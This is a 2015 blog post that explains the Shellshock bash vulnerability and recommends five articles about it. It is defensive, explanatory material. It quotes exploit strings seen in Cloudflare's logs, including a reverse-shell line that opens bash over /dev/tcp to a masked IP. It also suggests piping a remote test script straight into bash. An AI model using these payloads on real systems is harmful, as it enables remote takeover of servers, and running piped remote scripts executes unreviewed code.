Monday, March 30, 2015

5 Articles to Learn about Shellshock Bash Bug

5 Articles to Learn about Shellshock Bash Bug

The year of 2014 is looking like a year of biggest software bug and vulnerabilities. Earlier this year, internet was bleeding by Heartbleed vulnerability and now it's shocked by ShellShock bug. To me it looks like even bigger than Heartbleed, just because it's a bug in Bash Shell, our own bash shell, most popular among all UNIX shells like C and K. Given most of the servers in Investment banks, Insurance companies, Clouds and e-commerce domain are Linux Servers with bash being most used shell, impact is quite large. I am sure people with Microsoft stack is smiling somewhere :), but wait, read the full article. First details of Shellshock bug emerged Wednesday last week, since then it has gone viral, both online and offline. People are busy talking about it and engineers are busy patching Servers, computers, routers, firewalls and other computing resources using vulnerable versions of bash. It has triggered patching almost everywhere. I am sure many of my readers are still puzzling with what is this ShellShock bug? For those, It's an example of an arbitrary code execution (ACE) vulnerability, which means attacker can execute their code on your vulnerable server. What this mean to you? Well if they can execute their own command they can do anything to your server and business. To start-with they can stop your servers, delete files, stole passwords and can take complete control for the machine, operating them remotely. Typically, arbitrary code execution vulnerability attacks are very sophisticated and require expert understanding of the internals of code execution, memory layout, and assembly language, which makes them very hard. Thanks to Bash ShellShock bug, now even a naive programmer can launch such kind of powerful attack to take control of vulnerable server. To give you an example, due to ShellShock vulnerability, anyone can take control of your web server by simply sending an HTTP request. This is massive, but fortunately impact is only limited to servers, where server side program pass user supplied information to Bash Shell, if your Java server doesn't do that, you are probably safe from that path of attack.

By the way, If you were on vacation last week somewhere country side without any internet access, and knows nothing about ShellShock bug in Bash Shell, here is a list of 5 articles which will tell you everything about shell shock Bash bug, starting from what it is to how hackers are exploiting this vulnerabilities and celebrating early Christmas. There are even sites/tools to check if your server is vulnerable to ShellShock or not. You can use this website to test if your system is vulnerable, and also learn how to patch the vulnerability so you are no longer at risk for attack


Articles to Understand Bash ShellShock Bug

Inside Shellshock: How hackers are using it to exploit systems (https://blog.cloudflare.com/inside-shellshock/)
This is one of the best article I have read on ShellShock, and I suggest anyone to read this article first before reading others. Cloudflare has done very good job to explains ShellShock bug in simple word. By reading this you will know, how a magic string () { :; }; can give control of your server to an hacker sitting miles away. Cloudflare has not only quick on patching their servers and protecting their customer interest but also on educating people about this massive vulnerability. It goes will their business as well because they claim to block threats and limit abusive bots and crawlers from wasting their customer's bandwidth and server resources. There is one more reason, Why I connect with this article, It uses example to show how a hacker can use an innocuous looking HTTP request to exploit ShellShock vulnerability of bash shell. CloudFlare has also put in place WAF rules to block the shellshock exploit, and here are some of the common patterns this bug which emerges from their log files:
 
() { :;}; /bin/ping -c 1 198.x.x.x;
() { :;}; echo shellshock-scan > /dev/udp/example.com/1234
() { ignored;};/bin/bash -i >& /dev/tcp/104.x.x.x/80 0>&1

You can take a sigh of relief if you are CloudFlare customers, but you can also use these patterns to see if something like that is happening in your web server. Thanks to John Graham-Cumming for his excellent work. So What are you waiting for, go read this article before it's too late.


Everything you need to know about the ShellShock Bash bug (http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html)
Troy Hunt is a Microsoft Most Valuable Professional (MVP) for Developer Security, and earlier this year shared similar information on infamous Heartbleed bug. Tony has done excellent job to put together something definitive for people to dissect the hype from the true underlying risk. Starting from what is bash shell, and why you need it, Tony has shared what is the actual bug and what are the potential ramifications? It's not just all thrills but some fact also like which versions of Bash shells are affected, and when did the world first learn about shellshock bug and how long has it been at risk? He has also analysed how Microsoft stack can also be vulnerable to shellshock bug, given bash is mostly a UNIX shell and people will laugh about it. The best part of article is, what you can do about it. He has explained what's the next step from both, system admin and consumer's perspective. In short, this article is true to the title, everything you need to know about the shellshock bash bug


Shellshock DHCP Remote Code Execution – Proof of Concept (https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/)
It's one of the earlier article on ShellShock bug this week,written by Geoff Walton – Senior Security Consultant at TrustedSec. It gives you step by step guide of how Shell Shock can be exploited using any DHCP string value. I think one of the things this PoCs did really well was show the result for the end user. Most people aren't going to know what any of this stuff means, until they read a more straight forward explanation in layman's terms as to what this means for the average Internet user, and that's the first article in this list is my pick as the best post to understand shellshock bug.


Bash 'shellshock' bug is wormable (http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html)  
Robert Graham ran some early scans to gauge impact of this bug. Early results from his scan shows how many systems are vulnerable just on port 80, just on the root "/" URL, without Host field. He brings an excellent point about how CGI scripts can also be vulnerable if it calls out to bash no matter how indirectly. He also mention how embedded web serves on odd ports that are the real danger, and not just web, but other services like DHCP service are vulnerable to this bug.
Impact of Bash ShellShock Bug on Internet



Bash 'shellshock' scan of the Internet (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
This is the original scan Robert Graham did, the one we are talking about in earlier article. Now malwares are using his user agent, pretending as known scan. Robert ran his scan by stuffing a bunch of "ping home" commands in various CGI variables, just to see how widespread this bash bug vulnerability is, but enough to cause minor panic among many web masters. The scan found only a few thousand systems (because it's intentionally limited), it shows the the real potential of shellshock bug.
ShellShock vulnerability of Bash Shell Scanning


Shellshock BASH Vulnerability Tester (https://shellshocker.net/)
This site was developed by the health IT team at Medical Informatics Engineering. They have shared their learning about shellshock vulnerability, and what they did to protect their infrastructure. This site is good point to learn about shellshock bug and avoid getting "shellshocked". Many people has contribute simple commands to test whether your server is vulnerable to shellshock bug or not. For example, you can simply run this one liner below to find if you're vulnerable.
curl https://shellshocker.net/shellshock_test.sh | bash
If you want to test each exploit e.g. (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278) individually without running the script above, they also have step by step guide to do so. You can also find couple of posts about ShellShock exploit in real world by following links here.

In short, ShellShock is a vulnerability in GNU's bash shell that gives attackers access to run remote commands on a vulnerable system. If your system has not updated bash in since Tue Sep 30 2014: 1:32PM EST, you're most definitely vulnerable and have been since first boot. This security vulnerability affects versions 1.14 (released in 1994) to the most recent version 4.3 according to NVD. If you are hosted your web server with any of major cloud providers, chances are that they will be patched by now. If you are working in a big organization, you might have already noticed sudden surge in patching UNIX servers as well. I have not heard about any incident due to bash shellshock bug yet, which result in loss of information and hopefully servers will be patched before it's too late. 

No comments:

Post a Comment